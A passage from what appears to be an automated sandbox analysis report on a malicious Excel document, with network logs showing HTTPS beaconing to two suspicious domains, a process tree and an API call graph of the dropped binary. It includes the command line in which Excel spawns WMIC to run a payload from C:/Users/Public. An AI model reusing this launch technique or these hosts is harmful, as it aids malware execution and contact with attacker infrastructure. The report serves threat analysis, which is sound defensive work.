                                                                                                                                    Jun 10, 2021 20:32:36.867017031 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:32:36.947144032 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:36.947261095 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:32:55.028158903 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:32:55.079272032 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:55.129355907 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:55.129504919 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:25.150513887 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:25.200540066 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:25.251198053 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:25.251375914 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:55.256702900 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:55.306910992 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:55.358988047 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:55.359344959 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:34:25.363687038 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:34:25.415657997 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:34:25.464756012 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:34:25.465008974 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:34:55.470668077 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:34:55.521338940 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:34:55.573036909 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:34:55.573431969 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:35:25.598833084 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:35:25.649014950 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:25.701519012 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:25.701720953 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:35:55.706552982 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:35:55.756654024 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:55.808459044 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:55.808703899 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:36:25.814311028 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:36:25.866437912 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:36:25.916601896 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:36:25.916989088 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:36:55.924098015 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:36:55.975881100 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:36:56.025249004 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:36:56.025566101 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:37:26.032064915 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:37:26.083199024 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:37:26.131186962 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:37:26.131413937 CEST49739443192.168.2.4193.178.169.243

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jun 10, 2021 20:30:34.206564903 CEST4971453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:34.265006065 CEST53497148.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:36.034472942 CEST5802853192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:36.094928980 CEST53580288.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:36.527556896 CEST5309753192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:36.579847097 CEST53530978.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:37.512619972 CEST4925753192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:37.565578938 CEST53492578.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:38.587871075 CEST6238953192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:38.640319109 CEST53623898.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:39.676168919 CEST4991053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:39.729420900 CEST53499108.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:43.873945951 CEST5585453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:43.926970005 CEST53558548.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:45.612584114 CEST6454953192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:45.663584948 CEST53645498.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:46.848140001 CEST6315353192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:46.941303015 CEST53631538.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:47.008368969 CEST5299153192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:47.061393023 CEST53529918.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:47.385363102 CEST5370053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:47.463027000 CEST53537008.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:48.405050993 CEST5370053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:48.463570118 CEST53537008.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:49.474627018 CEST5370053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:49.547060013 CEST53537008.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:50.261271954 CEST5172653192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:50.311780930 CEST53517268.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:50.593030930 CEST5679453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:50.654596090 CEST53567948.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.202831030 CEST5653453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:51.262556076 CEST53565348.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.513902903 CEST5370053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:51.572402000 CEST53537008.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:52.146414995 CEST5662753192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:52.196537971 CEST53566278.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:53.110058069 CEST5662153192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:53.168947935 CEST53566218.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:53.953429937 CEST6311653192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:54.003418922 CEST53631168.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.151655912 CEST6407853192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:54.212208986 CEST53640788.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:55.563076019 CEST5370053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:55.622031927 CEST53537008.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:58.565296888 CEST6480153192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:58.615401983 CEST53648018.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:59.352473021 CEST6172153192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:30:59.405525923 CEST53617218.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:00.807920933 CEST5125553192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:31:00.858035088 CEST53512558.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:01.786041021 CEST6152253192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:31:01.839013100 CEST53615228.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:02.582092047 CEST5233753192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:31:02.635498047 CEST53523378.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:05.022397041 CEST5504653192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:31:05.084589005 CEST53550468.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:28.078067064 CEST4961253192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:31:28.155484915 CEST53496128.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:44.279566050 CEST4928553192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:31:44.342488050 CEST53492858.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:02.298568010 CEST5060153192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:02.362150908 CEST53506018.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:18.171941042 CEST6087553192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:18.308784962 CEST53608758.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:19.322381973 CEST5644853192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:19.384074926 CEST53564488.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:20.658437967 CEST5917253192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:20.725275040 CEST53591728.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:21.333220959 CEST6242053192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:21.402667046 CEST53624208.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:21.532211065 CEST6057953192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:21.592154980 CEST53605798.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:22.647661924 CEST5018353192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:22.706135035 CEST53501838.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:23.740199089 CEST6153153192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:23.885641098 CEST53615318.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:24.785346031 CEST4922853192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:24.845444918 CEST53492288.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:26.169083118 CEST5979453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:26.227855921 CEST53597948.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:27.690294981 CEST5591653192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:27.750433922 CEST53559168.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:28.589855909 CEST5275253192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:28.648789883 CEST53527528.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:39.751075983 CEST6054253192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:39.820959091 CEST53605428.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:42.083051920 CEST6068953192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:32:42.149908066 CEST53606898.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:24.917782068 CEST6420653192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:35:24.996901989 CEST53642068.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:25.490921974 CEST5090453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:35:25.565099001 CEST53509048.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:31.229485989 CEST5752553192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:35:31.299700975 CEST53575258.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:35.154139042 CEST5381453192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:35:35.204423904 CEST53538148.8.8.8192.168.2.4
                                                                                                                                    Jun 10, 2021 20:35:35.470817089 CEST5341853192.168.2.48.8.8.8
                                                                                                                                    Jun 10, 2021 20:35:35.539988041 CEST53534188.8.8.8192.168.2.4

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                    Jun 10, 2021 20:30:50.593030930 CEST192.168.2.48.8.8.80xf09cStandard query (0)pigeonious.comA (IP address)IN (0x0001)
                                                                                                                                    Jun 10, 2021 20:30:54.151655912 CEST192.168.2.48.8.8.80xc717Standard query (0)injuryless.comA (IP address)IN (0x0001)

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                    Jun 10, 2021 20:30:50.654596090 CEST8.8.8.8192.168.2.40xf09cNo error (0)pigeonious.com95.142.44.93A (IP address)IN (0x0001)
                                                                                                                                    Jun 10, 2021 20:30:54.212208986 CEST8.8.8.8192.168.2.40xc717No error (0)injuryless.com193.178.169.243A (IP address)IN (0x0001)
                                                                                                                                    Jun 10, 2021 20:35:24.996901989 CEST8.8.8.8192.168.2.40x725cNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                    HTTPS Packets

                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                    Jun 10, 2021 20:30:50.816432953 CEST95.142.44.93443192.168.2.449734CN=pigeonious.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jun 08 15:19:13 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Sep 06 15:19:13 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                    CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                                    Jun 10, 2021 20:30:54.346164942 CEST193.178.169.243443192.168.2.449739CN=injuryless.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu May 27 15:42:29 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Wed Aug 25 15:42:29 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                    CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    Analysis Process: EXCEL.EXE PID: 7076 Parent PID: 800

                                                                                                                                    General

                                                                                                                                    Start time:20:30:45
                                                                                                                                    Start date:10/06/2021
                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                    Imagebase:0x1150000
                                                                                                                                    File size:27110184 bytes
                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Chronological Activities

                                                                                                                                    Analysis Process: WMIC.exe PID: 2460 Parent PID: 7076

                                                                                                                                    General

                                                                                                                                    Start time:20:30:51
                                                                                                                                    Start date:10/06/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:wmic process call create 'C:/Users/Public/SettingSyncHost'
                                                                                                                                    Imagebase:0x60000
                                                                                                                                    File size:391680 bytes
                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    Chronological Activities

                                                                                                                                    Analysis Process: conhost.exe PID: 352 Parent PID: 2460

                                                                                                                                    General

                                                                                                                                    Start time:20:30:51
                                                                                                                                    Start date:10/06/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Chronological Activities

                                                                                                                                    Analysis Process: SettingSyncHost PID: 1808 Parent PID: 5060

                                                                                                                                    General

                                                                                                                                    Start time:20:30:52
                                                                                                                                    Start date:10/06/2021
                                                                                                                                    Path:C:\Users\Public\SettingSyncHost
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:/Users/Public/SettingSyncHost
                                                                                                                                    Imagebase:0x390000
                                                                                                                                    File size:511488 bytes
                                                                                                                                    MD5 hash:526D56017EF5105277FE0D366C95C39D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 17%, ReversingLabs
                                                                                                                                    Reputation:low

                                                                                                                                    Chronological Activities

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Reset < >

                                                                                                                                      Analysis Process: SettingSyncHost PID: 1808 Parent PID: 5060 SettingSyncHostCOMMON

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:85.7%
                                                                                                                                      Signature Coverage:25.2%
                                                                                                                                      Total number of Nodes:698
                                                                                                                                      Total number of Limit Nodes:5

                                                                                                                                      Graph

                                                                                                                                      execution_graph 34593 392a00 34594 392a2f 34593->34594 34595 392a47 GetModuleHandleW 34594->34595 34650 3931a1 34595->34650 34597 392a69 GetModuleFileNameW 34598 3931a1 27 API calls 34597->34598 34599 392a77 34598->34599 34600 392aa0 CreateFileW 34599->34600 34601 3931a1 27 API calls 34600->34601 34602 392ac8 34601->34602 34603 392af6 GetFileSize 34602->34603 34604 3931a1 27 API calls 34603->34604 34605 392b12 GlobalAlloc 34604->34605 34606 3931a1 27 API calls 34605->34606 34607 392b29 34606->34607 34608 392b57 SetFilePointer 34607->34608 34609 3931a1 27 API calls 34608->34609 34610 392b77 34609->34610 34611 392ba0 GetFileSize 34610->34611 34612 3931a1 27 API calls 34611->34612 34613 392bc5 ReadFile 34612->34613 34614 3931a1 27 API calls 34613->34614 34615 392be1 _strcat 34614->34615 34616 392c87 GetSystemTime 34615->34616 34617 3931a1 27 API calls 34616->34617 34618 392ca0 _strlen 34617->34618 34619 392d17 GetFileSize 34618->34619 34620 3931a1 27 API calls 34619->34620 34621 392d37 34620->34621 34622 392d75 GetModuleHandleA 34621->34622 34623 3931a1 27 API calls 34622->34623 34624 392d8b 34623->34624 34655 3d9366 34624->34655 34626 3931a1 27 API calls 34627 392ef0 GetTickCount 34626->34627 34628 3931a1 27 API calls 34627->34628 34629 392eff 34628->34629 34630 392f0f GetTickCount 34629->34630 34683 394e3f 136 API calls __wfsopen 34629->34683 34632 3931a1 27 API calls 34630->34632 34634 392f1e 34632->34634 34633 392f0c 34633->34630 34635 392f2c GetTickCount 34634->34635 34684 394cf3 97 API calls 7 library calls 34634->34684 34637 3931a1 27 API calls 34635->34637 34639 392f3b 34637->34639 34638 392f29 34638->34635 34640 392f49 GetTickCount 34639->34640 34685 394ba9 104 API calls 7 library calls 34639->34685 34641 3931a1 27 API calls 34640->34641 34644 392f58 34641->34644 34643 392f46 34643->34640 34645 392f65 34644->34645 34686 394a35 101 API calls 14 library calls 34644->34686 34647 3931a1 27 API calls 34645->34647 34648 392f78 34647->34648 34651 3931a3 34650->34651 34652 3931a4 34650->34652 34651->34597 34687 3952e0 27 API calls failwithmessage 34652->34687 34654 3931b9 34654->34597 34656 3d9372 __FrameHandler3::FrameUnwindToState 34655->34656 34688 3d90c6 34656->34688 34658 3d9379 34659 3d94d2 34658->34659 34671 3d93a3 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 34658->34671 34817 3d9957 4 API calls 2 library calls 34659->34817 34661 3d94d9 34818 3e1158 22 API calls __purecall 34661->34818 34663 3d94df 34819 3e111c 22 API calls __purecall 34663->34819 34665 3d94e7 34820 3d9b71 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 34665->34820 34666 392ee9 34666->34626 34668 3d94ed 34668->34668 34669 3d9443 34696 3e170e 34669->34696 34671->34666 34671->34669 34813 3e0d09 36 API calls 5 library calls 34671->34813 34673 3d9449 34700 3d6cf0 GetConsoleWindow ShowWindow 34673->34700 34677 3d946a 34677->34661 34678 3d946e 34677->34678 34679 3d9477 34678->34679 34815 3e110d 22 API calls __purecall 34678->34815 34816 3d9237 70 API calls ___scrt_uninitialize_crt 34679->34816 34682 3d9480 34682->34666 34683->34633 34684->34638 34685->34643 34686->34645 34687->34654 34689 3d90cf 34688->34689 34821 3d9776 IsProcessorFeaturePresent 34689->34821 34691 3d90db 34822 3db58e 10 API calls 2 library calls 34691->34822 34693 3d90e0 34694 3d90e4 34693->34694 34823 3db5ad 7 API calls 2 library calls 34693->34823 34694->34658 34697 3e1717 34696->34697 34699 3e171c 34696->34699 34824 3e1472 34697->34824 34699->34673 34875 3cefd0 34700->34875 34702 3d6d4d 34890 3d1600 34702->34890 34704 3d6d68 34705 3d7727 34704->34705 34706 3d6d99 std::ios_base::_Ios_base_dtor __fread_nolock 34704->34706 35151 3de23f 24 API calls 2 library calls 34705->35151 34706->34706 34709 3cefd0 26 API calls 34706->34709 34708 3d772c 35152 3de23f 24 API calls 2 library calls 34708->35152 34711 3d6e16 34709->34711 34713 3cefd0 26 API calls 34711->34713 34712 3d7731 35153 3ca560 26 API calls 2 library calls 34712->35153 34715 3d6e3b 34713->34715 34894 3cab90 34715->34894 34716 3d7736 35154 3de23f 24 API calls 2 library calls 34716->35154 34719 3d6e69 34722 3cab90 26 API calls 34719->34722 34720 3d773b 35155 3ca560 26 API calls 2 library calls 34720->35155 34731 3d6e7c std::ios_base::_Ios_base_dtor 34722->34731 34723 3d7740 35156 3de23f 24 API calls 2 library calls 34723->35156 34725 3d7745 35157 3de23f 24 API calls 2 library calls 34725->35157 34727 3d6f9e 34908 3d8ed5 34727->34908 34728 3d6f03 InternetOpenA 34732 3d6f2f InternetConnectA 34728->34732 34733 3d6f77 GetLastError 34728->34733 34731->34725 34731->34727 34731->34728 34732->34727 34737 3d6f6b InternetCloseHandle 34732->34737 35124 3d01b0 34733->35124 34736 3d6fac 34922 3cbb10 34736->34922 34737->34733 34745 3cab90 26 API calls 34747 3d7003 34745->34747 34965 3ca5a0 34747->34965 34751 3d700b 34751->34708 34753 3d7060 std::ios_base::_Ios_base_dtor 34751->34753 34971 3cbf90 34753->34971 34754 3d7700 std::ios_base::_Ios_base_dtor 35144 3d8ec4 34754->35144 34759 3d7723 34814 3d9a77 GetModuleHandleW 34759->34814 34762 3d709c 35072 3d0e10 34762->35072 34766 3d70c2 35091 3d35e0 34766->35091 34770 3d70d8 34774 3d70ee 34770->34774 35141 3d09d0 26 API calls 4 library calls 34770->35141 35095 3d79b0 34774->35095 34785 3d716b std::ios_base::_Ios_base_dtor 34785->34716 34786 3d727a std::ios_base::_Ios_base_dtor 34785->34786 34786->34720 34788 3d72b0 34786->34788 34789 3d0e10 26 API calls 34788->34789 34790 3d72df 34789->34790 34791 3cefd0 26 API calls 34790->34791 34792 3d7310 34791->34792 35115 3d12a0 34792->35115 34795 3d737c std::ios_base::_Ios_base_dtor 34796 3d73d6 34795->34796 34797 3d7390 GetLastError 34795->34797 34798 3cab90 26 API calls 34796->34798 34799 3d01b0 26 API calls 34797->34799 34800 3d73ee 34798->34800 34801 3d73a6 34799->34801 35142 3d6a10 GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 34800->35142 34803 3cdfe0 66 API calls 34801->34803 34805 3d73ad 34803->34805 34804 3d73f9 34806 3cab90 26 API calls 34804->34806 34807 3d73b6 InternetCloseHandle InternetCloseHandle 34805->34807 34811 3d6f94 std::ios_base::_Ios_base_dtor 34805->34811 34808 3d7415 34806->34808 34807->34811 35143 3d6ac0 7 API calls 2 library calls 34808->35143 34810 3d7468 34810->34811 34812 3d748f InternetCloseHandle InternetCloseHandle 34810->34812 34811->34725 34811->34754 34812->34811 34813->34669 34814->34677 34815->34679 34816->34682 34817->34661 34818->34663 34819->34665 34820->34668 34821->34691 34822->34693 34823->34694 34825 3e147b 34824->34825 34828 3e1491 34824->34828 34825->34828 34830 3e149e 34825->34830 34827 3e1488 34827->34828 34843 3e15f0 14 API calls 3 library calls 34827->34843 34828->34699 34831 3e14aa 34830->34831 34832 3e14a7 34830->34832 34844 3eb26a 34831->34844 34832->34827 34838 3e5cbf _free 13 API calls 34840 3e14eb 34838->34840 34839 3e14c7 34863 3e5cbf 34839->34863 34840->34827 34842 3e14bc 34842->34838 34843->34828 34845 3e14b1 34844->34845 34846 3eb273 34844->34846 34850 3eb6f5 GetEnvironmentStringsW 34845->34850 34869 3e5acd 36 API calls 3 library calls 34846->34869 34848 3eb296 34870 3eb0b6 46 API calls 4 library calls 34848->34870 34851 3eb70c 34850->34851 34861 3eb762 34850->34861 34871 3eb607 WideCharToMultiByte 34851->34871 34852 3eb76b FreeEnvironmentStringsW 34853 3e14b6 34852->34853 34853->34842 34862 3e14f1 24 API calls 3 library calls 34853->34862 34855 3eb725 34855->34861 34872 3e5cf9 14 API calls 3 library calls 34855->34872 34857 3eb735 34858 3eb74d 34857->34858 34873 3eb607 WideCharToMultiByte 34857->34873 34860 3e5cbf _free 13 API calls 34858->34860 34860->34861 34861->34852 34861->34853 34862->34839 34864 3e5cca RtlFreeHeap 34863->34864 34868 3e5cf3 __dosmaperr 34863->34868 34865 